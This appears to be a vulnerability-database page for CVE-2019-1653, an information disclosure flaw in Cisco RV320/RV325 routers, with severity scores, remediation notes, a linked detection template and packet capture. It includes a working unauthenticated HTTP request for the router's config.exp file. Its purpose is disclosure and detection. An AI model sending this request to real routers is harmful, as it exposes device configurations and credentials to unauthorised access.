🔙 목록으로 돌아가기

CVE-2019-1653: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure

TitleCisco Small Business WAN VPN Routers - Sensitive Information Disclosure
Authordwisiswant0
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
RemediationCisco has released firmware updates that address this vulnerability.
CVSS Score7.5
EPSS Score0.94378
CVE IDCVE-2019-1653
CWE IDCWE-200,CWE-284
Tags cve cve2019 packetstorm kev edb cisco router exposure vkev vuln

🔍 Vulnerability Description

Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.

🌐 HTTP Request

GET /cgi-bin/config.exp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-1653.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-1653.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A